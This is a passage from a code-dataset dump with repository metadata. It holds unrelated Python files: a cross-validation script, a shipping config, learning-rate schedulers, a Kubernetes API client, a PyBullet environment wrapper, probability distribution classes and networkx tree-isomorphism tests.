y_pred=clf.multi(X_train_cv,y_train_cv,X_test_cv,3,y_test=y_test_cv)
xx.append(multiclass_log_loss(y_test_cv,y_pred))
print xx[-1]#,y_pred.shape,zz[-1]
ypred[test_index]=y_pred
print xx
print 'average:',np.mean(xx),'std',np.std(xx)
return ypred,np.mean(xx)
mem = Memory("./mycache")
@mem.cache
def get_data(name):
data = load_svmlight_file(name)
return data[0], data[1]
X, _ = get_data('../sparse/rebuild1.svm')
X1, _ =get_data('../sparse/rebuild2.svm')
X2, _ = get_data('../sparse/rebuild3.svm')
X3, _ =get_data('../sparse/rebuild4.svm')
X4, _ =get_data('../sparse/rebuild5.svm')
X5, _ =get_data('../sparse/rebuild6.svm')
xx=[]
xx.append(np.sum(X.todense(),axis=1))
xx.append(np.sum(X1.todense(),axis=1))
xx.append(np.sum(X2.todense(),axis=1))
xx.append(np.sum(X3.todense(),axis=1))
xx.append(np.sum(X4.todense(),axis=1))
xx.append(np.std(X.todense(),axis=1))
xx.append(np.std(X1.todense(),axis=1))
xx.append(np.std(X2.todense(),axis=1))
xx.append(np.std(X3.todense(),axis=1))
xx.append(np.std(X4.todense(),axis=1))
#xx.append(np.sum(sparse.hstack([X,X1,X2,X3,X4],format='csr').todense(),axis=1))
#xx.append(np.max(X.todense(),axis=1)-np.min(X.todense(),axis=1))
#xx.append(np.max(X1.todense(),axis=1)-np.min(X1.todense(),axis=1))
#xx.append(np.max(X2.todense(),axis=1)-np.min(X2.todense(),axis=1))
#xx.append(np.max(X3.todense(),axis=1)-np.min(X3.todense(),axis=1))
#xx.append(np.max(X4.todense(),axis=1)-np.min(X4.todense(),axis=1))
xx=np.hstack(xx)
X=sparse.hstack([X,X1,X2,X3,X4,xx,pickle.load(open('../explore/X2.p'))],format='csr').todense()
train=pd.read_csv('../explore/train1.csv')
idname='id'
label='fault_severity'
idx=train[idname].as_matrix()
y=np.array(train[label])
import pickle
X=np.hstack([X,train.drop([label,idname],axis=1).as_matrix()])
#X=np.hstack([X,train[['location','volume']].as_matrix()])
print X.shape, y.shape
from scipy.stats import pearsonr
xx=[]
for i in X.T:
score=pearsonr(np.array(i.T).ravel(),y)[0]
if np.abs(score)>1e-2:
xx.append(np.array(i.T).ravel())
X=np.array(xx).T
print X.shape, y.shape
yp,score=kfold_cv(X,y,4)
print X.shape, y.shape
print yp.shape
s=pd.DataFrame({idname:idx,'predict_0':yp[:,0],'predict_1':yp[:,1],'predict_2':yp[:,2],'real':y})
s.to_csv('va.csv',index=False)
import subprocess
cmd='cp mycv.py cvbackup/mycv_%f.py'%(score)
subprocess.call(cmd,shell=True)
cmd='cp va.csv cvbackup/va_%f.csv'%(score)
subprocess.call(cmd,shell=True)
|
[
"[email protected]"
] | |
d39dbb85f0ea8a843010ed2ff417e14430ec8b04
|
ae381913c23385f004b82161624097645ba8c4c8
|
/Huaxian_eemd/projects/plot_decompositions.py
|
8dbd45db6556f91e1ce3f8e7adbb1107c6385152
|
[
"MIT"
] |
permissive
|
zjy8006/MonthlyRunoffForecastByAutoReg
|
aa37910fdc66276d0df9d30af6885209d4a4ebfc
|
661fcb5dcdfbbb2ec6861e1668a035b50e69f7c2
|
refs/heads/master
| 2020-12-12T05:25:48.768993 | 2020-08-20T07:21:12 | 2020-08-20T07:21:12 | 259,588,564 | 7 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 271 |
py
|
import pandas as pd
import os
root_path = os.path.dirname(os.path.abspath('__file__'))
import sys
sys.path.append(root_path)
from tools.plot_utils import plot_decompositions
signal = pd.read_csv(root_path+'/Huaxian_eemd/data/EEMD_TRAIN.csv')
plot_decompositions(signal)
|
[
"[email protected]"
] | |
613939625c016e2ed72cd4b6885baa6b413b8c7e
|
5946112229fe1d9a04b7536f076a656438fcd05b
|
/dev_env/lib/python3.8/site-packages/pygments/styles/rrt.py
|
2b1908794c8703c74074b3c356e1d1022988809b
|
[] |
no_license
|
Gear-Droid/openCV_study_project
|
3b117967eb8a28bb0c90088e1556fbc1d306a98b
|
28c9a494680c4a280f87dd0cc87675dfb2262176
|
refs/heads/main
| 2023-05-14T14:27:42.284265 | 2021-06-05T00:16:09 | 2021-06-05T00:16:09 | 307,807,458 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 885 |
py
|
# -*- coding: utf-8 -*-
"""
pygments.styles.rrt
~~~~~~~~~~~~~~~~~~~
pygments "rrt" theme, based on Zap and Emacs defaults.
:copyright: Copyright 2006-2020 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Comment, Name, Keyword, String
class RrtStyle(Style):
"""
Minimalistic "rrt" theme, based on Zap and Emacs defaults.
"""
background_color = '#000000'
highlight_color = '#0000ff'
styles = {
Comment: '#00ff00',
Name.Function: '#ffff00',
Name.Variable: '#eedd82',
Name.Constant: '#7fffd4',
Keyword: '#ff0000',
Comment.Preproc: '#e5e5e5',
String: '#87ceeb',
Keyword.Type: '#ee82ee',
}
|
[
"[email protected]"
] | |
1400cc7e36dc1608eda6cf944b667fb37a1ea0b3
|
b19dfd6a3ba5d107d110fb936de2e91d1d92bb99
|
/venv/lib/python3.7/site-packages/Satchmo-0.9.3-py3.7.egg/shipping/modules/ups/config.py
|
5c8e90a363eefc21999a9a0da571173a720a91b8
|
[] |
no_license
|
siddhant3030/djangoecommerce
|
d8f5b21f29d17d2979b073fd9389badafc993b5c
|
b067cb1155c778fece4634d0a98631a0646dacff
|
refs/heads/master
| 2022-12-13T15:28:39.229377 | 2019-09-28T10:30:02 | 2019-09-28T10:30:02 | 207,240,716 | 2 | 1 | null | 2022-12-11T01:34:25 | 2019-09-09T06:35:36 |
Python
|
UTF-8
|
Python
| false | false | 3,913 |
py
|
from decimal import Decimal
from django.utils.translation import ugettext_lazy as _
from livesettings.values import StringValue,ConfigurationGroup,BooleanValue,DecimalValue,MultipleStringValue
from livesettings.functions import config_register_list,config_get
SHIP_MODULES = config_get('SHIPPING', 'MODULES')
SHIP_MODULES.add_choice(('shipping.modules.ups', 'UPS'))
SHIPPING_GROUP = ConfigurationGroup('shipping.modules.ups',
_('UPS Shipping Settings'),
requires = SHIP_MODULES,
ordering = 101)
config_register_list(
StringValue(SHIPPING_GROUP,
'XML_KEY',
description=_("UPS XML Access Key"),
help_text=_("XML Access Key Provided by UPS"),
default=""),
StringValue(SHIPPING_GROUP,
'USER_ID',
description=_("UPS User ID"),
help_text=_("User ID provided by UPS site."),
default=""),
StringValue(SHIPPING_GROUP,
'ACCOUNT',
description=_("UPS Account Number"),
help_text=_("UPS Account Number."),
default=""),
StringValue(SHIPPING_GROUP,
'USER_PASSWORD',
description=_("UPS User Password"),
help_text=_("User password provided by UPS site."),
default=""),
MultipleStringValue(SHIPPING_GROUP,
'UPS_SHIPPING_CHOICES',
description=_("UPS Shipping Choices Available to customers. These are valid domestic codes only."),
choices = (
(('01', 'Next Day Air')),
(('02', 'Second Day Air')),
(('03', 'Ground')),
(('12', '3 Day Select')),
(('13', 'Next Day Air Saver')),
(('14', 'Next Day Air Early AM')),
(('59', '2nd Day Air AM')),
),
default = ('03',)),
DecimalValue(SHIPPING_GROUP,
'HANDLING_FEE',
description=_("Handling Fee"),
help_text=_("The cost of packaging and getting the package off"),
default=Decimal('0.00')),
StringValue(SHIPPING_GROUP,
'SHIPPING_CONTAINER',
description=_("Type of container used to ship product."),
choices = (
(('00', 'Unknown')),
(('01', 'UPS LETTER')),
(('02', 'PACKAGE / CUSTOMER SUPPLIED')),
),
default = "00"),
BooleanValue(SHIPPING_GROUP,
'SINGLE_BOX',
description=_("Single Box?"),
help_text=_("Use just one box and ship by weight? If no then every item will be sent in its own box."),
default=True),
BooleanValue(SHIPPING_GROUP,
'TIME_IN_TRANSIT',
description=_("Time in Transit?"),
help_text=_("Use the UPS Time In Transit API? It is slower but delivery dates are more accurate."),
default=False),
StringValue(SHIPPING_GROUP,
'PICKUP_TYPE',
description=_("UPS Pickup option."),
choices = (
(('01', 'DAILY PICKUP')),
(('03', 'CUSTOMER COUNTER')),
(('06', 'ONE TIME PICKUP')),
(('07', 'ON CALL PICKUP')),
),
default = "07"),
BooleanValue(SHIPPING_GROUP,
'LIVE',
description=_("Access production UPS server"),
help_text=_("Use this when your store is in production."),
default=False),
StringValue(SHIPPING_GROUP,
'CONNECTION',
description=_("Submit to URL"),
help_text=_("Address to submit live transactions."),
default="https://onlinetools.ups.com/ups.app/xml/Rate"),
StringValue(SHIPPING_GROUP,
'CONNECTION_TEST',
description=_("Submit to TestURL"),
help_text=_("Address to submit test transactions."),
default="https://wwwcie.ups.com/ups.app/xml/Rate"),
BooleanValue(SHIPPING_GROUP,
'VERBOSE_LOG',
description=_("Verbose logs"),
help_text=_("Send the entire request and response to the log - for debugging help when setting up UPS."),
default=False)
)
|
[
"[email protected]"
] | |
4da4aa68a0cd83d1a57b20435439e06bad9395a2
|
fc6f709f916fcd201938157990c77fa9202eefa7
|
/model/optimizer.py
|
4a9ee5afce8f27d52a2e33ea778b94ad326ffc29
|
[
"MIT"
] |
permissive
|
chenchy/StyleSpeech
|
441ffd6d71ac0269d205ad66c9536fe00cb5267c
|
e0e4ad25681f9ecc2a01ba1b87cbe0c59472b792
|
refs/heads/main
| 2023-05-27T21:39:04.790584 | 2021-06-13T10:32:03 | 2021-06-13T11:26:38 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,650 |
py
|
import torch
import numpy as np
class ScheduledOptimMain:
""" A simple wrapper class for learning rate scheduling """
def __init__(self, model, train_config, model_config, current_step):
self._optimizer = torch.optim.Adam(
model.parameters(),
betas=train_config["optimizer"]["betas"],
eps=train_config["optimizer"]["eps"],
weight_decay=train_config["optimizer"]["weight_decay"],
)
self.n_warmup_steps = train_config["optimizer"]["warm_up_step"]
self.anneal_steps = train_config["optimizer"]["anneal_steps"]
self.anneal_rate = train_config["optimizer"]["anneal_rate"]
self.current_step = current_step
self.init_lr = np.power(model_config["transformer"]["encoder_hidden"], -0.5)
def step_and_update_lr(self):
self._update_learning_rate()
self._optimizer.step()
def zero_grad(self):
# print(self.init_lr)
self._optimizer.zero_grad()
def load_state_dict(self, path):
self._optimizer.load_state_dict(path)
def _get_lr_scale(self):
lr = np.min(
[
np.power(self.current_step, -0.5),
np.power(self.n_warmup_steps, -1.5) * self.current_step,
]
)
for s in self.anneal_steps:
if self.current_step > s:
lr = lr * self.anneal_rate
return lr
def _update_learning_rate(self):
""" Learning rate scheduling per step """
self.current_step += 1
lr = self.init_lr * self._get_lr_scale()
for param_group in self._optimizer.param_groups:
param_group["lr"] = lr
class ScheduledOptimDisc:
""" A simple wrapper class for learning rate scheduling """
def __init__(self, model, train_config):
self._optimizer = torch.optim.Adam(
model.parameters(),
betas=train_config["optimizer"]["betas"],
eps=train_config["optimizer"]["eps"],
weight_decay=train_config["optimizer"]["weight_decay"],
)
self.init_lr = train_config["optimizer"]["lr_disc"]
self._init_learning_rate()
def step_and_update_lr(self):
self._optimizer.step()
def zero_grad(self):
# print(self.init_lr)
self._optimizer.zero_grad()
def load_state_dict(self, path):
self._optimizer.load_state_dict(path)
def _init_learning_rate(self):
lr = self.init_lr
for param_group in self._optimizer.param_groups:
param_group["lr"] = lr
|
[
"[email protected]"
] | |
5b8aced9977d9f12adf0d4b703c3e25b1e55c899
|
e16911f1fae7bf90f405e055e0f90731ae8c8042
|
/etc/st2packgen/files/actions/lib/k8sbase.py
|
89df63259b4fbf47136ae2a8cdf29077dfb9461e
|
[] |
no_license
|
bobhenkel/stackstorm-kubernetes
|
87136448434b1a6c821cfeb757f88833ca8ecf02
|
32b8538597bc5290a18cefadbf98fea7f8bb38bd
|
refs/heads/master
| 2021-04-25T22:06:36.392650 | 2017-11-02T04:30:02 | 2017-11-02T04:30:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,242 |
py
|
from __future__ import absolute_import
from pyswagger.core import BaseClient
from requests import Session, Request
import six
import json
import base64
class Client(BaseClient):
# declare supported schemes here
__schemes__ = set(['http', 'https'])
def __init__(self, config=None, auth=None, send_opt=None, extraheaders=None):
""" constructor
:param auth pyswagger.SwaggerAuth: auth info used when requesting
:param send_opt dict: options used in requests.send, ex verify=False
"""
super(Client, self).__init__(auth)
if send_opt is None:
send_opt = {}
self.__s = Session()
self.__send_opt = send_opt
self.extraheaders = extraheaders
auth = base64.b64encode(config['user'] + ":" + config['password'])
self.authhead = {"authorization": "Basic " + auth}
def request(self, req_and_resp, opt):
# passing to parent for default patching behavior,
# applying authorizations, ...etc.
req, resp = super(Client, self).request(req_and_resp, opt)
req.prepare(scheme=self.prepare_schemes(req).pop(), handle_files=False)
req._patch(opt)
file_obj = []
def append(name, obj):
f = obj.data or open(obj.filename, 'rb')
if 'Content-Type' in obj.header:
file_obj.append((name, (obj.filename, f, obj.header['Content-Type'])))
else:
file_obj.append((name, (obj.filename, f)))
for k, v in six.iteritems(req.files):
if isinstance(v, list):
for vv in v:
append(k, vv)
else:
append(k, v)
rq = Request(
method=req.method.upper(),
url=req.url,
params=req.query,
data=req.data,
headers=req.header,
files=file_obj
)
rq = self.__s.prepare_request(rq)
rq.headers.update(self.authhead)
rs = self.__s.send(rq, stream=True, **self.__send_opt)
myresp = {}
myresp['status'] = rs.status_code
myresp['data'] = json.loads(rs.content.rstrip())
# myresp['headers'] = rs.headers
return myresp
|
[
"[email protected]"
] | |
c06bcf0c5bf8278caf07c0496ba1c817c184ba8d
|
3d2e5d1092acccfb73c07d68b6beeffc44b3f776
|
/imitation/src/environments/simulation/pybullet_env.py
|
10ef9e12e56c2333e0813282dd5bdfe598ed1611
|
[] |
no_license
|
MatthijsBiondina/WorldModels
|
f6cbcfe5349da7119329ef10831810d1b85c9d02
|
ab468f1aa978e3aa4e05174db24922085d1e33b1
|
refs/heads/master
| 2022-12-22T11:54:46.040828 | 2020-09-23T11:41:48 | 2020-09-23T11:41:48 | 248,212,491 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,560 |
py
|
import gym
import pybulletgym
import numpy as np
from src.environments.general.environment_template import Environment
from src.utils import config as cfg
_ = pybulletgym
PREP_VECTORS = {'InvertedPendulumSwingupPyBulletEnv-v0': np.array([1, 0.2, 1, 1, 0.067], dtype=np.float16)}
def preprocess_observation(obs):
"""
:param obs: unprocessed observation
:return: normalized observation
"""
return np.clip(obs * PREP_VECTORS[cfg.env_name], -1., 1.)
class SimEnv(Environment):
def __init__(self, save_loc: str):
super().__init__(save_loc)
self.env = gym.make(cfg.env_name)
self.t = 0
self.actions = [np.zeros(self.action_size)] * cfg.latency
def reset(self):
"""
Reset environment
:return: observation at t=0
"""
self.t = 0
self.actions = [np.zeros(self.action_size)] * cfg.latency
return preprocess_observation(self.env.reset())
def step(self, action: np.ndarray):
"""
Perform action and observe next state. Action is repeated 'action_repeat' times.
:param action: the action to take
:return: next observation, reward, terminal state
"""
obs, done = None, None
reward = 0
self.actions.append(action)
for k in range(cfg.action_repeat):
obs, reward_k, done, _ = self.env.step(self.actions[0])
reward += reward_k
done = done or self.t == cfg.max_episode_length
if done:
break
self.actions.pop(0)
return preprocess_observation(obs), reward, done
def render(self) -> np.ndarray:
"""
Renders the environment to RGB array
:return: frame capture of environment
"""
return self.env.render(mode='rgb_array')
def close(self):
"""
Cleanup
:return: n/a
"""
self.env.close()
def sample_random_action(self) -> np.ndarray:
"""
Sample an action randomly from a uniform distribution over all valid actions
:return: random action
"""
return self.env.action_space.sample()
@property
def obs_size(self) -> int:
"""
GETTER METHOD
:return: size of observations in this environment
"""
return self.env.observation_space.shape[0]
@property
def action_size(self):
"""
GETTER METHOD
:return: size of actions in this environment
"""
return self.env.action_space.shape[0]
|
[
"[email protected]"
] | |
c8a58abf83afbf6366b65b7dc1ee8f6a5d6ef831
|
24ffbd64e1892ab633ca785e969ccef43f17a9f2
|
/picomotor/devices/h2_yr.py
|
efa1098cd7f197e7875e4fee3720cf40bfa6fb58
|
[] |
no_license
|
yesrgang/labrad_tools.srq
|
e29fcbfc4f5228955de1faddab6a66df52ccdd03
|
0dfbf2609d2f7a7e499167decedb0d9ea3677978
|
refs/heads/master
| 2021-06-18T19:59:21.448762 | 2021-02-04T22:03:49 | 2021-02-04T22:03:49 | 155,478,765 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 155 |
py
|
from picomotor.devices.nf8742.device import NF8742
class Motor(NF8742):
socket_address = ('192.168.1.20', 23)
controller_axis = 4
Device = Motor
|
[
"[email protected]"
] | |
092db6afd0b046dcf1485a91be052fd57d5c502e
|
a177931c2914cc9820c578add9d57aa6c75084ce
|
/tips/customHTML/test_genTABHTML.py
|
cfd92464403354ae73e44a3df5bc666a81d2eb93
|
[] |
no_license
|
zhangshoug/others
|
45d94f96701362cb077eb994c27295247a6fb712
|
3a8a8366f2598a5e88b44d18d346e81f4eef659e
|
refs/heads/master
| 2022-12-18T22:37:13.505543 | 2020-09-28T08:54:28 | 2020-09-28T08:54:28 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,021 |
py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: test_genTABHTML
Description : tab css style test
Author : pchaos
date: 2019/9/9
-------------------------------------------------
Change Activity:
2019/9/9:
-------------------------------------------------
"""
import unittest
from unittest import TestCase
from .genTabHTML import genTABHTML
class TestGenTABHTML(TestCase):
def test_genHTML(self):
# 需要生成的文件名list。模板文件为:template.html,模板数据文件名为:需要生成的文件名+".ini"
flist = ["main.htm", "main_tech.htm", "hacker.html"]
# inifile = '{}.ini'.format(flist[0])
renderList = []
for fn in flist:
inifile = '{}.ini'.format(fn)
gh = genTABHTML()
# gh.outputFilename = fn
gh.outputFilename = "test"
gh.iniFilename = inifile
try:
templateFile = "customHTML/template.tab.table.html"
of, render = gh.genHTML(None,
# of, render = gh.genHTML("a{}".format(fn),
title=fn.split(".")[0],
prettify=False,
template=templateFile)
except Exception as e:
templateFile = "template.tab.table.html"
of, render = gh.genHTML(None,
# of, render = gh.genHTML("a{}".format(fn),
title=fn.split(".")[0],
prettify=False,
template=templateFile)
print("输出文件完成 {}".format(of))
# print(render)
self.assertTrue(len(render) > 100)
renderList.append(render)
print(renderList)
# main
inifile = '{}.ini'.format(flist[0])
gh = genTABHTML()
# gh.outputFilename = fn
gh.iniFilename = inifile
try:
templateFile = "template.tab.html"
render = gh.renders(renderList,
prettify=True,
# template="customHTML/template.tab.html",
template=templateFile,
title="Main")
except Exception as e:
templateFile = "customHTML/template.tab.html"
render = gh.renders(renderList,
prettify=True,
# template="customHTML/template.tab.html",
template=templateFile,
title="Main")
saveText = ""
for r in render:
saveText += r
gh.save('main.htm', saveText)
print("输出文件完成 {}".format(render))
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
6b7ec47b7dfaed08aeefb1d1ec11acaff71addf7
|
447e9ec821dc7505cc9b73fb7abeb220fe2b3a86
|
/rvpy/logistic.py
|
2d66e011e93fb9f8e4dc0e7ab086276b4445ba04
|
[
"MIT"
] |
permissive
|
timbook/rvpy
|
ecd574f91ed50fd47b6ead8517954f01e33c03a7
|
301fd61df894d4b300176e287bf9e725378c38eb
|
refs/heads/master
| 2020-03-19T04:01:49.283213 | 2018-12-18T19:21:07 | 2018-12-18T19:21:07 | 135,788,512 | 1 | 0 |
MIT
| 2018-12-18T19:21:08 | 2018-06-02T04:55:39 |
Python
|
UTF-8
|
Python
| false | false | 3,722 |
py
|
import numpy as np
from math import log, exp
from scipy.stats import logistic, fisk
from . import distribution
class Logistic(distribution.Distribution):
"""
Logistic Distribution using the following parameterization:
f(x | loc, scale) = exp(-z) / (s * (1 + exp(-z))^2)
where z = (x - loc) / scale
Parameters
----------
loc : float, positive
Location parameter
scale : float, positive
Scale parameter
Methods
-------
exp()
Transforms self to LogLogistic
Relationships
-------------
Let X be Logistic, a, b float. Then:
* aX + b is Logistic
* exp(X) is Log-Logistic
"""
def __init__(self, loc=0, scale=1):
"""
Parameters
----------
loc : float, positive
Location parameter
scale : float, positive
Scale parameter
"""
assert scale > 0, "scale parameter must be positive"
# Parameters
self.loc = loc
self.scale = scale
# Scipy backend
self.sp = logistic(loc=loc, scale=scale)
super().__init__()
def __repr__(self):
return f"Logistic(loc={self.loc}, scale={self.scale})"
def __add__(self, other):
if isinstance(other, (int, float)):
return Logistic(self.loc + other, self.scale)
else:
raise TypeError(f"Can't add or subtract objects of type {type(other)} to Logistic")
def __mul__(self, other):
if isinstance(other, (int, float)):
return Logistic(other * self.loc, other * self.scale)
else:
raise TypeError(f"Can't multiply objects of type {type(other)} by Logistic")
def __truediv__(self, other):
if isinstance(other, (int, float)):
return self.__mul__(1/other)
else:
raise TypeError(f"Can't divide objects of type {type(other)} by Logistic")
def exp(self):
return LogLogistic(alpha=exp(self.loc), beta=1/self.scale)
# TODO: Gumbel - Gumbel = Logistic
class LogLogistic(distribution.Distribution):
"""
LogLogistic Distribution using the following parameterization:
f(x | a, b) = (b/a) * (x/a)^(b-1) / (1 + (x/a)^b)^2
Parameters
----------
alpha : float, positive
Scale parameter
beta : float, positive
Shape parameter
Methods
-------
log()
Transforms self to Logistic
Relationships
-------------
Let X be LogLogistic, k > 0 float. Then:
* kX is LogLogistic
* log(X) is Logistic
"""
def __init__(self, alpha, beta):
"""
Parameters
----------
alpha : float, positive
Scale parameter
beta : float, positive
Shape parameter
"""
assert alpha > 0, "alpha must be positive"
assert beta > 0, "alpha must be positive"
# Parameters
self.alpha = alpha
self.beta = beta
# Scipy backend
self.sp = fisk(c=beta, scale=alpha)
super().__init__()
def __repr__(self):
return f"LogLogistic(alpha={self.alpha}, beta={self.beta})"
def __mul__(self, other):
if isinstance(other, (int, float)):
return LogLogistic(other*self.alpha, self.beta)
else:
raise TypeError(f"Can't multiply objects of type {type(other)} by LogLogistic")
def __truediv__(self, other):
if isinstance(other, (int, float)):
return self.__mul__(1/other)
else:
raise TypeError(f"Can't divide objects of type {type(other)} by LogLogistic")
def log(self):
return Logistic(loc=np.log(self.alpha), scale=1/self.beta)
|
[
"[email protected]"
] | |
df016bf13355458c6083ae6c2005a1cebd3ceecb
|
7b6313d1c4e0e8a5bf34fc8ac163ad446bc69354
|
/datastructure and algorithms/[hackerrank]The Hurdle Race.py
|
5bcab2ab43d0415da1bf267cba2ff15bee29380b
|
[] |
no_license
|
menuka-maharjan/competitive_programming
|
c6032ae3ddcbc974e0e62744989a2aefa30864b2
|
22d0cea0f96d8bd6dc4d81b146ba20ea627022dd
|
refs/heads/master
| 2023-05-01T05:23:09.641733 | 2021-05-23T16:22:21 | 2021-05-23T16:22:21 | 332,250,476 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 144 |
py
|
nk=input().split()
n=int(nk[0])
k=int(nk[1])
l=list(map(int,input().rstrip().split()))
x=max(l)
if((x-k)>=0):
print(x-k)
else:
print(0)
|
[
"[email protected]"
] | |
85596fb3ff870c316d4d7b3553f515d5d673f9b9
|
2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8
|
/pardus/tags/2007/desktop/kde/autostart/actions.py
|
5bd7b2827ebfb6bdfc4093743e2fb7ed2daacc96
|
[] |
no_license
|
aligulle1/kuller
|
bda0d59ce8400aa3c7ba9c7e19589f27313492f7
|
7f98de19be27d7a517fe19a37c814748f7e18ba6
|
refs/heads/master
| 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 286 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/copyleft/gpl.txt.
from pisi.actionsapi import kde
def setup():
kde.configure()
def build():
kde.make()
def install():
kde.install()
|
[
"[email protected]"
] | |
677993bbfd1033c8a7be8606b387754616bdceda
|
853d4cec42071b76a80be38c58ffe0fbf9b9dc34
|
/venv/Lib/site-packages/networkx/algorithms/isomorphism/tests/test_tree_isomorphism.py
|
3082365a4bb61f2d8c99fcddb56c72e2af1d0aeb
|
[] |
no_license
|
msainTesting/TwitterAnalysis
|
5e1646dbf40badf887a86e125ef30a9edaa622a4
|
b1204346508ba3e3922a52380ead5a8f7079726b
|
refs/heads/main
| 2023-08-28T08:29:28.924620 | 2021-11-04T12:36:30 | 2021-11-04T12:36:30 | 424,242,582 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,443 |
py
|
import networkx as nx
import random
import time
from networkx.classes.function import is_directed
from networkx.algorithms.isomorphism.tree_isomorphism import (
rooted_tree_isomorphism,
tree_isomorphism,
)
# have this work for graph
# given two trees (either the directed or undirected)
# transform t2 according to the isomorphism
# and confirm it is identical to t1
# randomize the order of the edges when constructing
def check_isomorphism(t1, t2, isomorphism):
# get the name of t1, given the name in t2
mapping = {v2: v1 for (v1, v2) in isomorphism}
# these should be the same
d1 = is_directed(t1)
d2 = is_directed(t2)
assert d1 == d2
edges_1 = []
for (u, v) in t1.edges():
if d1:
edges_1.append((u, v))
else:
# if not directed, then need to
# put the edge in a consistent direction
if u < v:
edges_1.append((u, v))
else:
edges_1.append((v, u))
edges_2 = []
for (u, v) in t2.edges():
# translate to names for t1
u = mapping[u]
v = mapping[v]
if d2:
edges_2.append((u, v))
else:
if u < v:
edges_2.append((u, v))
else:
edges_2.append((v, u))
return sorted(edges_1) == sorted(edges_2)
def test_hardcoded():
print("hardcoded test")
# define a test problem
edges_1 = [
("a", "b"),
("a", "c"),
("a", "d"),
("b", "e"),
("b", "f"),
("e", "j"),
("e", "k"),
("c", "g"),
("c", "h"),
("g", "m"),
("d", "i"),
("f", "l"),
]
edges_2 = [
("v", "y"),
("v", "z"),
("u", "x"),
("q", "u"),
("q", "v"),
("p", "t"),
("n", "p"),
("n", "q"),
("n", "o"),
("o", "r"),
("o", "s"),
("s", "w"),
]
# there are two possible correct isomorphisms
# it currently returns isomorphism1
# but the second is also correct
isomorphism1 = [
("a", "n"),
("b", "q"),
("c", "o"),
("d", "p"),
("e", "v"),
("f", "u"),
("g", "s"),
("h", "r"),
("i", "t"),
("j", "y"),
("k", "z"),
("l", "x"),
("m", "w"),
]
# could swap y and z
isomorphism2 = [
("a", "n"),
("b", "q"),
("c", "o"),
("d", "p"),
("e", "v"),
("f", "u"),
("g", "s"),
("h", "r"),
("i", "t"),
("j", "z"),
("k", "y"),
("l", "x"),
("m", "w"),
]
t1 = nx.Graph()
t1.add_edges_from(edges_1)
root1 = "a"
t2 = nx.Graph()
t2.add_edges_from(edges_2)
root2 = "n"
isomorphism = sorted(rooted_tree_isomorphism(t1, root1, t2, root2))
# is correct by hand
assert (isomorphism == isomorphism1) or (isomorphism == isomorphism2)
# check algorithmically
assert check_isomorphism(t1, t2, isomorphism)
# try again as digraph
t1 = nx.DiGraph()
t1.add_edges_from(edges_1)
root1 = "a"
t2 = nx.DiGraph()
t2.add_edges_from(edges_2)
root2 = "n"
isomorphism = sorted(rooted_tree_isomorphism(t1, root1, t2, root2))
# is correct by hand
assert (isomorphism == isomorphism1) or (isomorphism == isomorphism2)
# check algorithmically
assert check_isomorphism(t1, t2, isomorphism)
# randomly swap a tuple (a,b)
def random_swap(t):
(a, b) = t
if random.randint(0, 1) == 1:
return (a, b)
else:
return (b, a)
# given a tree t1, create a new tree t2
# that is isomorphic to t1, with a known isomorphism
# and test that our algorithm found the right one
def positive_single_tree(t1):
assert nx.is_tree(t1)
nodes1 = [n for n in t1.nodes()]
# get a random permutation of this
nodes2 = nodes1.copy()
random.shuffle(nodes2)
# this is one isomorphism, however they may be multiple
# so we don't necessarily get this one back
someisomorphism = [(u, v) for (u, v) in zip(nodes1, nodes2)]
# map from old to new
map1to2 = {u: v for (u, v) in someisomorphism}
# get the edges with the transformed names
edges2 = [random_swap((map1to2[u], map1to2[v])) for (u, v) in t1.edges()]
# randomly permute, to ensure we're not relying on edge order somehow
random.shuffle(edges2)
# so t2 is isomorphic to t1
t2 = nx.Graph()
t2.add_edges_from(edges2)
# lets call our code to see if t1 and t2 are isomorphic
isomorphism = tree_isomorphism(t1, t2)
# make sure we got a correct solution
# although not necessarily someisomorphism
assert len(isomorphism) > 0
assert check_isomorphism(t1, t2, isomorphism)
# run positive_single_tree over all the
# non-isomorphic trees for k from 4 to maxk
# k = 4 is the first level that has more than 1 non-isomorphic tree
# k = 13 takes about 2.86 seconds to run on my laptop
# larger values run slow down significantly
# as the number of trees grows rapidly
def test_positive(maxk=14):
print("positive test")
for k in range(2, maxk + 1):
start_time = time.time()
trial = 0
for t in nx.nonisomorphic_trees(k):
positive_single_tree(t)
trial += 1
print(k, trial, time.time() - start_time)
# test the trivial case of a single node in each tree
# note that nonisomorphic_trees doesn't work for k = 1
def test_trivial():
print("trivial test")
# back to an undirected graph
t1 = nx.Graph()
t1.add_node("a")
root1 = "a"
t2 = nx.Graph()
t2.add_node("n")
root2 = "n"
isomorphism = rooted_tree_isomorphism(t1, root1, t2, root2)
assert isomorphism == [("a", "n")]
assert check_isomorphism(t1, t2, isomorphism)
# test another trivial case where the two graphs have
# different numbers of nodes
def test_trivial_2():
print("trivial test 2")
edges_1 = [("a", "b"), ("a", "c")]
edges_2 = [("v", "y")]
t1 = nx.Graph()
t1.add_edges_from(edges_1)
t2 = nx.Graph()
t2.add_edges_from(edges_2)
isomorphism = tree_isomorphism(t1, t2)
# they cannot be isomorphic,
# since they have different numbers of nodes
assert isomorphism == []
# the function nonisomorphic_trees generates all the non-isomorphic
# trees of a given size. Take each pair of these and verify that
# they are not isomorphic
# k = 4 is the first level that has more than 1 non-isomorphic tree
# k = 11 takes about 4.76 seconds to run on my laptop
# larger values run slow down significantly
# as the number of trees grows rapidly
def test_negative(maxk=11):
print("negative test")
